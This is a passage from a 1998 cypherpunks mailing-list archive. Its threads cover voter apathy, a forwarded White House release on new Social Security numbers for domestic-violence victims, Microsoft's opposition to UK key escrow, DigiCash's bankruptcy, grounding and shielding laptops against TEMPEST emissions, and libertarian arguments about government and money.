be exactly like today. So, as long as things are Fair to good (or great),
there won't be a lot of people intersted in voting, unless things look like
they are going to make a radical change, which leads us to the 3 big reason:

	3) As Jimmy notes, there usually isn't much of a difference between
one canidate and the other (outside of the Natural Law types), and those
canidates who _are_ different (Libertarians, Socialists &etc. ("reform"
types don't count, they really are for making tomorrow just like yesterday
& today, only they ADMIT it for the most part)) either don't get enough
votes to challenge the status quo, or if there is an issue that will
challenge the status quo, the number of voters tends to increase (to
varying degrees).
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 6 Nov 1998 01:33:45 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Text: Gore Announces New SS# Effort for Victims of Domestic  Violence
Message-ID: <v04020a0ab267856af09a@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-Sender: believer@telepath.com
Date: Thu, 05 Nov 1998 09:31:32 -0600
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: Text: Gore Announces New SS# Effort for Victims of Domestic
  Violence
Mime-Version: 1.0
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: believer@telepath.com

Source:  USIA
http://www.usia.gov/current/news/latest/98110403.wlt.html?/products/washfile
/newsitem.shtml

04 November 1998

TEXT: GORE ANNOUNCES EFFORT FOR VICTIMS OF DOMESTIC
VIOLENCE

(SS numbers to be changed to help victims escape abusers) (630)

Washington -- Vice President Al Gore announced November 4 a new policy
to allow victims of domestic violence to change their Social Security
number.

"Today, our message to the victims of these hateful crimes is this: we
will offer you the protection you need to regain your safety and
rebuild your life. You have suffered enough without having to fight
for the protections you need to start a new life for yourself and your
children," Gore said, according to a press release from his office.

The vice president also mentioned a new booklet, "Protecting Victims
of Domestic Violence: A Law Enforcement Officer's Guide to Enforcing
Orders of Protection Nationwide," that outlines the meaning of the
Violence Against Women Act's requirement to give full faith and credit
orders of protection for victims of domestic violence.

Following is the text of the release:

(Begin text)

November  4, 1998

THE WHITE HOUSE
Office of the Vice President
For Immediate Release
Wednesday, November 4, 1998

VICE PRESIDENT GORE ANNOUNCES NEW POLICY TO ALLOW VICTIMS OF DOMESTIC
VIOLENCE TO CHANGE THEIR SOCIAL SECURITY NUMBER

Washington, DC -- Vice President Gore announced today a new effort to
help victims of domestic violence escape their abusers -- a federal
policy that will make it easier for victims to change their social
security numbers.

"Today, our message to the victims of these hateful crimes is this: we
will offer you the protection you need to regain your safety and
rebuild your life," Vice President Gore said. "You have suffered
enough without having to fight for the protections you need to start a
new life for yourself and your children."

For the first time, victims of domestic violence will be able to get a
new Social Security number simply by providing written affirmation of
their domestic abuse from a third party, such as a local shelter,
treating physician, or law enforcement official.

The Social Security Administration's (SSA) employees in field offices
nationwide will work closely with local domestic violence shelters,
the police, the courts, treating physicians, medical facilities, and
psychologists to help victims of domestic violence get the
documentation necessary to secure a new Social Security number.

Previously, the SSA required victims to provide proof that their
abuser had misused their Social Security number. For victims of
domestic violence, providing this kind of proof was extremely
difficult -- only victims who were severely abused or who were in
danger of losing their lives were allowed to change their Social
Security number.

To improve its services to victims of domestic violence, the SSA will
post on its web site the steps a victim needs to take to change their
Social Security number and provide important referral information.

The Vice President also announced a Presidential directive for the
Office of Personnel Management to prepare a resource guide that will:
(1) assist victims of domestic violence by providing up-to-date
information about available resources and outline strategies to ensure
safety; and (2) help those who know anyone who is being abused to
prevent and respond to the situation. This guide will list private as
well as public resources such as counseling, law enforcement, federal
workplace leave policies, and substance abuse programs.

In addition, he highlighted a new booklet, "Protecting Victims of
Domestic Violence: A Law Enforcement Officer's Guide to Enforcing
Orders of Protection Nationwide," that outlines the meaning of the
Violence Against Women Act's requirement to give full faith and credit
orders of protection for victims of domestic violence. This booklet
was written by the International Association of Chiefs of Police with
a grant from the Justice Department. It will be disseminated to law
enforcement officers nationwide to teach them how to enforce
protection orders.

(End text)
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Fri, 6 Nov 1998 04:10:47 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Re: How to test *your* microwave oven distribution pattern.
Message-ID: <3641FFB1.75BB@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim,

you said...
*****
If you do decide to stake your laptop as refered above there are a few
things to know....

 -      Make sure the stake is in suitable ground without lots of quartz
        and other similar peizo-electric materials.

 -      The stake should extend at least 3ft. into the ground.

 -      When the stake is driven in, the ground should be thoroughly
wetted
        which usualy means quite a bit of water (30 gals or so should do
        it), if possible wet it over a 24 hour period prior to staking.

 -      Make sure the stake and the cable leading to the laptop are
copper
        (or silver if you're rich)

 -      You don't want to be close to phone, power, and other sorts of
        underground utilities.
****

Please explain to me why it matters that the box be grounded!

Radiated energy from chips and traces is independent of your mongo
ground strap to the mother ship. All the strap does is alter the DC
potential. Shield your box well but design out the leg irons and the
geological requirements.

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Fri, 6 Nov 1998 02:43:03 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: TEMPEST laptops (fwd)
In-Reply-To: <199811050611.AAA10989@einstein.ssz.com>
Message-ID: <v0401170bb2677ca4c6a6@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:11 AM -0500 11/5/98, Jim Choate wrote:
>Forwarded message:
>> Date: Wed, 4 Nov 1998 21:45:29 -0800
>> From: Tim May <tcmay@got.net>
>> Subject: Re: TEMPEST laptops
>
>> Radio waves scatter...they don't just travel in pure line of sight. And
>> even if they travelled only in line of sight, the reflections from inside
>> the box and then into the room and then off surfaces....
>
>It depends on the frequency. Last time I checked a laser or a maser (both
>are radio waves strictly speaking) travel LOS. The scattering comes from
>beam divergence and incidental refractions and reflections from the
>molecules in the air and supported detritus.

	And both Lasers and Masers scatter under certain conditions. If you
can see the laser, it is scattering a bit of [energy light photons]

	That is what Mr. May is talking about.

	I was under the (apparently false) impression that things like
animal bodies, and ordinary building materials (like wood, Lathe &
plaster/drywall) wouldn't stop or significantly bounce the beams back the
way you didn't want them to go.

	I was thinking more of controling the direction of the RF, rather
than trying to completely supress it.

	It doesn't appear that will work.

>> Microwave ovens work by having the waves bounce around inside a box. Any
>> significant hole or crack (up to roughly half the wavelength) would let the
>> waves out.
>
>Depends on the size of the hole and location. In most microwave ovens there
>are definite dead-spots (corners and the exact center of the area are
>notorius).

	We're not cooking Hotdogs here, and we aren't using (for the most
part) microwaves. Yes, you can heat a hotdog on a PII, but that is more
from heat radiation than RF.

	Microwave ovens also leak RF.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Fri, 6 Nov 1998 02:37:36 +0800
To: cypherpunks@cyberpass.net
Subject: Re: IP: Text: Gore Announces New SS# Effort for Victims ofDomestic    Violence
In-Reply-To: <v04020a0ab267856af09a@[139.167.130.246]>
Message-ID: <v0401170db26789cfde9f@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:40 AM -0500 11/5/98, Robert Hettinga wrote:

>"Today, our message to the victims of these hateful crimes is this: we
>will offer you the protection you need to regain your safety and
>rebuild your life. You have suffered enough without having to fight
>for the protections you need to start a new life for yourself and your
>children," Gore said, according to a press release from his office.

	Give them a Military Surplus .45 and teach them to shoot straight.
Much cheaper in the long run as it will either eliminate the abuse up
front, or both the abuse and the abuser.

>The vice president also mentioned a new booklet, "Protecting Victims
>of Domestic Violence: A Law Enforcement Officer's Guide to Enforcing
>Orders of Protection Nationwide," that outlines the meaning of the
>Violence Against Women Act's requirement to give full faith and credit
>orders of protection for victims of domestic violence.

	Isn't there some law that prohibits discrimination because of gender?

>For the first time, victims of domestic violence will be able to get a
>new Social Security number simply by providing written affirmation of
>their domestic abuse from a third party, such as a local shelter,
>treating physician, or law enforcement official.

	This shouldn't be too tough.

>The Social Security Administration's (SSA) employees in field offices
>nationwide will work closely with local domestic violence shelters,
>the police, the courts, treating physicians, medical facilities, and
>psychologists to help victims of domestic violence get the
>documentation necessary to secure a new Social Security number.

	Who wants to bet that soon they will talk about reducing or denying
benefits for "abusers".

--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 6 Nov 1998 02:02:19 +0800
To: cypherpunks@cyberpass.net
Subject: Microsoft Statement
Message-ID: <v04020a0eb2678e370261@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


X-Authentication-Warning: www.ispo.cec.be: majordom set sender to
owner-e-commerc@www.ispo.cec.be using -f
Date: Thu, 5 Nov 1998 09:16:56 -0500
From: Freddie Dawkins <freddied@compuserve.com>
Subject: Microsoft Statement
To: CEC E-commerce list <E-commerc@www.ispo.cec.be>
MIME-Version: 1.0
Sender: owner-e-commerc@www.ispo.cec.be
Precedence: bulk
Reply-To: Freddie Dawkins <freddied@compuserve.com>

All here -
I thought you might like to see this. It was published at the ICX London
conference on October 19.
Rgds
Freddie Dawkins
ICX - Building Trust in E-commerce
------------------------------------------------------------------------

Statement of Microsoft on UK Department of Trade and Industry
Proposals for Encryption on Digital Signatures

October 1998

Microsoft welcomes this opportunity to respond to recent DTI proposals on
encryption and digital signatures.  As a leading developer of business
software applications, on-line tools and operating systems, Microsoft
strongly supports the growth of electronic commerce in Europe.

1. UK legislation should eliminate all key escrow and key recovery
requirements.

The UK should not make the use of encryption subject to mandatory key
escrow.  The DTI's Secure Electronic Commerce Statement of April 1998
contemplates authorising law enforcement to obtain access to private
encryption keys on request. This could effectively require users or
encryption service providers to "escrow" their private keys, which would
depart from the Statement's rejection of mandatory key escrow and make the
use of encryption more costly and burdensome.  Many users would also view
the obligation to store copies of their private keys as compromising the
security of their on-line messages, thus deterring them from fully
exploiting electronic commerce.

Mandatory key escrow does not serve any legitimate law enforcement goals.
Key escrow serves no legitimate law enforcement goals because criminals and
terrorists are unlikely to store their private keys or provide them to
police on request.  Law enforcement's needs in this area could be fully met
by requiring users to produce the plain text of any message to which police
require access.

2. The proposed legislation should extend legal recognition to all digital
signatures.

Legal recognition should extend to all electronic signatures, not just
those issued by licensed certification authorities (CAs).  The secure
Electronic Commerce Statement would limit legal recognition to certificates
issued by licensed CAs.  Because virtually all users will want to rely on
the legal validity of their electronic signatures, this would effectively
require the use of licensed CAs.  Such a rule would impose unnecessary
costs on electronic commerce and would place UK law in conflict with the
proposed EU Electronic Signatures Directive, which extends legal
recognition to both licensed and unlicensed electronic signatures.

UK law should extend legal recognition to closed-system and limited-use
certificates and affirm parties' freedom of contract.  Electronic
signatures are used in a variety of closed systems and for a broad range of
specific uses, such as on-line banking and credit card systems.  Because
closed-system and limited-use certificates will play a crucial role in the
development of on-line applications, the law should expressly extend legal
recognition to such certificates.  UK legislation should also treat
electronic and paper transactions the same in terms of freedom of contract,
so that private parties have the same flexibility to structure their
electronic transactions as they do for traditional forms of commerce.

The proposed legislation should not require licensed CAs to escrow
encryption keys.  Many users of electronic signatures will refuse to allow
their private encryption keys to be escrowed, and will therefore refuse to
use licensed CAs if they must also hand over their private encryption keys.
 Such a result would undermine the use of electronic signatures and would
threaten the development of electronic commerce in the UK.  Thus, UK law
should allow licensed CAs to provide encryption services without
maintaining a key escrow or key recovery system.

3. DTI should abandon plans to extend existing export controls to
"intangible" transfers.

Applying existing export controls to intangible transfers of encryption is
unworkable and impractical.  In its recent white paper on Strategic Export
Controls (July 1998), DTI announced plans to extend existing export
controls to intangible transfers.  However, strong encryption is widely
available on the Internet from servers located outside the UK.  Thus, the
proposed restrictions would not prevent criminals from using strong
encryption, but would impose added costs and burdens on lawful
manufacturers and distributors of encryption products.

The proposed export controls will harm UK firms.  UK businesses already
face a competitive disadvantage to foreign competitors due to restrictions
on exporting encryption in tangible form.  To extend this to intangible
transfers will make it even more difficult for UK firms to compete
globally.

The UK should loosen, rather than tighten, existing export controls on
encryption.  Export restrictions on encryption make it much more expensive
for UK firms to compete globally, without having any real impact on crime.
Rather than act unilaterally on this issue, the UK should adhere to the
European-wide standards set forth in the EU Regulation on Dual-Use Goods.

/ends

#  #  #  #  #  #  #  #  #  #  #  #  #  #  #  #  #  #  #  #  #  #  #  #  #
To leave the list, send email to Majordomo@www.ispo.cec.be saying
unsubscribe E-commerc your@email.address
as the first line of your message (*not* as the subject)
#  #  #  #  #  #  #  #  #  #  #  #  #  #  #  #  #  #  #  #  #  #  #  #  #

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 6 Nov 1998 02:16:57 +0800
To: Digital Bearer Settlement List <cypherpunks@cyberpass.net
Subject: Digicash in serious trouble
Message-ID: <v04020a0fb26791d5dc21@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


X-Sender: stalder@fis.fis.utoronto.ca
Mime-Version: 1.0
Date: 	Thu, 5 Nov 1998 12:03:10 -0500
To: micropay@ai.mit.edu
From: Felix Stalder <stalder@fis.utoronto.ca>
Subject:  Digicash in serious trouble
Sender: owner-micropay@ai.mit.edu
Precedence: bulk
Reply-To: micropay@ai.mit.edu

[bad news]

http://www.news.com/News/Item/0,4,28360,00.html

By Tim Clark
Staff Writer, CNET News.com
November 4, 1998, 6:05 p.m. PT

Electronic-cash pioneer DigiCash said today it's filing for Chapter 11
bankruptcy protection after shrinking its payroll to about six people from
nearly 50 in February.

The company, which has been running off a bridge loan from its venture
capital investors since June, is seeking new investors from established
financial institutions or a buyer for its software technology. The
company's operations in the Netherlands, where it was founded, were
liquidated in September.

"To really launch and brand something like this in the Internet space is
likely to take a fair amount more capital," said Scott Loftesness,
DigiCash's interim CEO since August. "It's more appropriate for strategic
investors, corporate players or banks themselves as a consortium model."

Electronic-cash schemes have found difficult sledding recently. First
Virtual Holdings, which had a form of e-cash, exited the business in July.
CyberCash's CyberCoin offering hasn't really caught on. Digital Equipment,
now part of Compaq Computer is testing its Millicent electronic cash, and
IBM is in early trials for a product called Minipay.

Under bankruptcy laws, DigiCash's Chapter 11 filing allows the company to
continue operations, while keeping its creditors at bay as the company
reorganizes. Most of DigiCash's $4 million in debt is owed to its initial
venture capital financiers who extended the bridge loan, August Capital,
Applied Technology, and Dutch investment firm Gilde Investment.

DigiCash's eCash allows consumers to make anonymous payments of any
amount--and anonymity differentiates eCash against other e-cash schemes.
DigiCash's intellectual property assets include patents, protocols, and
software systems that also could be used for applications, like online
electronic voting or private scrip issued by a particular retailer.

DigiCash suffered a setback in September when the only U.S. bank offering
its scheme, Mark Twain Bank, dropped the offering. But a number of major
banks in Europe and Australia offer or are testing DigiCash's electronic
cash.

Also in September, DigiCash closed its Dutch operations and liquidated its
assets there.

Loftesness said DigiCash has a list of 35-40 potential partners, and he
has been talking to players like IBM for months. He expects to resolve
DigiCash's status in the next five months.

"Everybody feels anonymous e-cash is inevitable, but the existing
situation was not going to get there from here," said Loftesness, who is
frustrated by potential partners telling him, "This is absolutely
strategic, but unfortunately it's not urgent."

The company was founded by David Chaum and was well-known in the
Internet's earliest days. MIT Media Labs' Nicholas Negroponte is a
director of DigiCash.


---
#  distributed via nettime-l : no commercial use without permission
#  <nettime> is a closed moderated mailinglist for net criticism,
#  collaborative text filtering and cultural politics of the nets
#  more info: majordomo@desk.nl and "info nettime-l" in the msg body
#  URL: http://www.desk.nl/~nettime/  contact: nettime-owner@desk.nl





-----|||||---||||----|||||--------||||----

Les faits sont faits.
http://www.fis.utoronto.ca/~stalder

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Fri, 6 Nov 1998 05:42:47 +0800
To: Jim Choate <cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: How to test *your* microwave oven distribution pattern.
In-Reply-To: <199811051447.IAA12209@einstein.ssz.com>
Message-ID: <3.0.5.32.19981105130909.007f1730@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain



At 08:47 AM 11/5/98 -0600, Jim Choate wrote:
>Here's a simple way to test the bounce-pattern of your micro-wave oven:

Simpler: stick a neon-bulb with the leads twisted off into the oven.
Watch the glow vary. Put a cup of water in there since you're not supposed
to run empty.

You of course know about CDs as uwave detectors :-)

> -	Make sure the stake is in suitable ground without lots of quartz
>        and other similar peizo-electric materials.

Not piezo (though quartz is), but non conductive.  You have to 
tap the groundwater table.  Sand, granite don't conduct.









  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 6 Nov 1998 04:12:20 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: TEMPEST laptops (fwd)
Message-ID: <199811051947.NAA13767@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 05 Nov 1998 09:28:06 -0800
> From: Michael Motyka <mmotyka@lsil.com>
> Subject: Re: TEMPEST laptops (fwd)

> The distinction you are trying to express is that not all signals have
> equal information content and that it is the levels of the high-content
> ones that matter.

Nope. What I am saying is the absolute magnitude of the carrier wave is
irrelevant, it's the modulation that matters and that modulation if small
and it's riding on a big carrier is hard to get at because you swamp your
front-ends because of dynamic range.

> Fine, but shielding is indiscriminate so shield away.

Shielding will attenuate all parts of the signal so it is a Good Thing (TM).

> And run your Tesla coil and some Ramones music to increase the ambient
> noise while you're doing sensitive computing.

Gabba gabba hey hey...thought I don't run my Tesla Coil when my computers
are on, they object to the 4ft sparks.

> Look for MIB carrying Dewars in your neighborhood! 
> How cold do Peltier junctions get? 
> Probably good enough for a sidewinder or a low-noise rcvr.

Peltier devices are for thermal transport by binding the thermal photons
and transporting them to a different environ where they may be emitted.
Hence the original environ is cooled.

You're talking about Josephson Junctions I suspect and they're useless for
signal detection, they're a switch. SQUIDS are what are used for truly
small level signals.

The KKK took my baby away....


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Fri, 6 Nov 1998 06:45:04 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
Message-ID: <5F152E6E8E6FD21195DF00104B2425AD02B24B@yarrowbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




> Robert Hettinga wrote:
> > A government is just another economic actor. A very large 
> > economic actor with lots of guns and a monopoly on force, 
> > but an economic actor nonetheless.
> 
> No they are not,
> 
> Yes, they are. Can you say 'taxes'?

Imposed by a gun.

> Can you say 'interstate commerce'?

What about it?

> Can you say 'mint money'? Can you say 'federal reserve'?

Can you say government fiat?

> Can you say 'FDIC'?

Can you say banking regulation at the point of a gun?
 
> I thought so.

Yep.

> > History shows this.
> 
> Really? What history?

The Soviet Union is a prime recent example. British Mercantilism.
Governments are ultimately bound to economics in the sense of human behavior
and productivity -- the more they deny the nature of microeconomic actors,
the quicker they self-destruct.
History shows that every dynasty well eventually self-destruct, to think
ours won't is foolish. My point is we don't have competitive governments per
se, you have a power void that is filled by new government that can be just
as hostile to those microeconomic actors. All our government failures have
yet to produce a sustainable government.

> False distinction. Politics is about control and power

The fundamental laws of economics are supply and demand. As soon as you
through force into the equation, it is no longer economic, it is political.

> in human society that breaks down to force and money.

The essence of money has no political roots. The essence of money is human
productivity and trade.

Money is tied to politics currently because it is regulated by force of
government and the money *supply* is created by government fiat.

> There you go again, confusing privacy with economics...

The discussion *was* *privacy*, or did you completely miss the initial
discussion? Privacy (as opposed to secrecy) is about discretionary
disclosure of information. To invade privacy is to remove or prevent that
discretion. There is an economic cost of doing so, and an economic benefit.
Corporations are bound by those economics, whereas government can mandate
transparency by whim and gun.

> > use coercive force today preventing privacy, but government is 
> > their instrument of force.
> 
> True, but that isn't a function of regulation per se only the 
> particular type of regulation that we have implimented.

It is the *nature* of regulation. The end element of any regulation is a
gun. Government is a natural instrument of collective legalized force by any
group that can influence it, and to think it can't and won't be influenced
denies human nature in regards to power. Every government is despotic by
nature, force corrupts. 

> > They have a *legal* monopoly on force (within a state).
> 
> No, they don't. It is perfectly legal for an individual to 
> own a weapon.

The legal monopoly on the *initiation* of force. And in fact you have very
little freedom (eternally diminishing) to obtain potential force (arms) and
use it in a *reactionary* manner. You have absolutely *no* freedom to use it
reactionary against government (which is in the face of the 4th).

> There is also a clear distinction between the local police, 
> your state police, federal agents, military, etc.

It is an irrelevant distinction in this case, it is all government. They do
not use force against each other as any sort of competitive balance.

> No it doesn't. It points to the fact that individuals want to 
> participate in some activity that some other party doesn't 
> want to occur.

General democratic consensus is highly controlled by media and government
propaganda (if they are not one in the same). What is the underlying
motivation?

Is hemp illegal because people don't want people to smoke weed, or because
of the cotton lobby?

Is the war on drugs so unbreakable because people don't want people taking
drugs, or because the government funds black operations with its sales, uses
it to confiscate private property, and as a sounding post for increased
powers?

Do people not want free banking, or does the government wish to protects its
fiat currency and artificial stability flying in the face of economic
reality?

> It does not imply that the regulating party wants the potential 
> income from those activities.

Money or power, more often than most people think.

> Further more, even in a free-market there will exist 
> black markets.

Provided you don't corrupt the meaning of free-market to include any
possible black market, then yes, there will *always* be a black market. It
can be made rather insignificant however.

> The aspect of a free-market is that there is no consequence from 
> such actions (unless you want to admit to allowing corporations to have
> their own hit squads).

And again you pervert the meaning of free market. I'm tired arguing that
subject with you, go read a book.

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 6 Nov 1998 04:50:37 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: How to test *your* microwave oven distribution pattern. (fwd)
Message-ID: <199811052002.OAA13832@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 05 Nov 1998 11:42:41 -0800
> From: Michael Motyka <mmotyka@lsil.com>
> Subject: Re: How to test *your* microwave oven distribution pattern.

> Please explain to me why it matters that the box be grounded!

Electricity runs from a high-potential point to ground. If it isn't grounded
it radiates away into space where it can be detected. If the Faraday Cage
isn't grounded it simply acts as a parasitic oscillator and re-emits the
signal from inside, though at a lower amplitude. Remember, charge rests on
the *OUTSIDE* of a object so that any charge picked up internaly gets passed
to the outside surface.

Which raises another point. Since sharp corners radiate better because they
hold larger charges one should probably avoid sharp angles or corners.
Though you might be able to use that to advantage by having a caged needle
that radiates the majority away into the grounded cage.

Probably the ideal 'laptop' would be a metal ball with a grounding wire and
a single large mil-spec connector that drives a HMD. Something like the Rock
City by Archistrat but round instead of cubical.

> Radiated energy from chips and traces is independent of your mongo
> ground strap to the mother ship.

Not if the ground plane on the pcb is built right. The amount of free-space
radiation can be minimized because the capacitive coupling between the
emitting source and the local ground is less than the capacitive coupling
to Earth through the atmosphere. Since the signal path impedence to the
local ground plain is lower it will carry, proportionaly, the majority 
of the signal.

> All the strap does is alter the DC
> potential. Shield your box well but design out the leg irons and the
> geological requirements.

Actualy it is much more complex than that, it effects the AC signal path
impedence as well - which is exactly what one wants.

As I said above, don't ground the box and it simply acts as a secondary
emitter. This is analogous to those parasitic oscillators they put in books
and such that ring an alarm if you walk between the poles at the store.

I'm at work right now so I can't get too specific but there is a book that I
have at home that is called 'Digital Black Magic' (I believe). It covers
a lot of these sorts of issues. When I'm home later I'll post a pointer
to the correct title, author, and ISBN.

The 1st rule of electrons:

They always take the shortest path to ground. 

Corollary:

If they can't get to ground they radiate their excess energy away as
photons.



    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Fri, 6 Nov 1998 06:44:32 +0800
To: cypherpunks@cyberpass.net
Subject: Now where am I gonna get a good horseburger?
Message-ID: <36422225.52F2@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



In CA it is now a felony to eat a horse. I don't remember asking to be
transported to Walt Disney World...wait 'til someone other than Gary
Larson anthropomorphises the chicken, cow and pig!

On a lighter, more technical note - 

Avoiding carefully, for the moment, Harvey Rook's statement that
weaknesses in cipher systems often lie in key generation and management
and not in the crypto algorithms, I'll ask a few -naive- questions:

If we construct a CSPRNG with a ?sufficiently? large state and then use
the output of that PRNG to generate a new key for each block encrypted
by a standard block cipher have we gained anything? Large files vs.
small? When used with triple encryption like 3DES? The ROI for finding a
single key is certainly much lower if the PRNG is "good".

I've never seen a PR keystream for a conventional block cipher discussed
so I thought I'd lob it out there.

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Fri, 6 Nov 1998 07:37:19 +0800
To: cypherpunks@cyberpass.net
Subject: No Subject
Message-ID: <99ebb21979319a23b4f5dafb9ef3cf83@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



Re voting for politicos:  just received this spam...
--------- Begin forwarded message ----------
Subject: Psst.....
Date: Wed, 4 Nov 1998 09:31:39 -0500
Message-ID:
<3.0.3.32.19981104093139.00b88b80@nyc-services.nis.newscorp.com>

>>>
>>>>When John Glenn returns from space, everybody dress in Ape Suits.
>>>>
>>>>Pass it on.
>>>>

--------- End forwarded message ----------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Albert P. Franco, II" <apf2@apf2.com>
Date: Thu, 5 Nov 1998 23:38:44 +0800
To: cypherpunks@cyberpass.net
Subject: Who Cares (fwd)
Message-ID: <3.0.3.32.19981105143404.00885e50@apf2.com>
MIME-Version: 1.0
Content-Type: text/plain




>
>Forwarded message:
>
>> From: "Blanc" <blancw@cnw.com>

>> policy:  what are all those other people doing?
>
>From: Jim Choate <ravage@EINSTEIN.ssz.com>
>If you're talking about the people who didn't vote, they're trying to keep
>from going under. Probably working two jobs, keeping the kids in school and
>out of trouble, saving for college, paying the house morgage off, etc. Who's
>in office won't make a whit of difference to any of that. It's irrelevant.
>
>If you're talking about the politicians, they're laughing their ass off on
>the way to the bank to cash their tax-derived income.
>
>
And then there are those of us who are denied our opportunity to vote
because the damn absentee ballot always seems to arrive a week after the
election!! 

Coincidence? Bad Luck? Or is it design?

APF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Elliott <melliott@ncsa.uiuc.edu>
Date: Fri, 6 Nov 1998 05:48:25 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Re: How to test *your* microwave oven distribution pattern.
In-Reply-To: <3641FFB1.75BB@lsil.com>
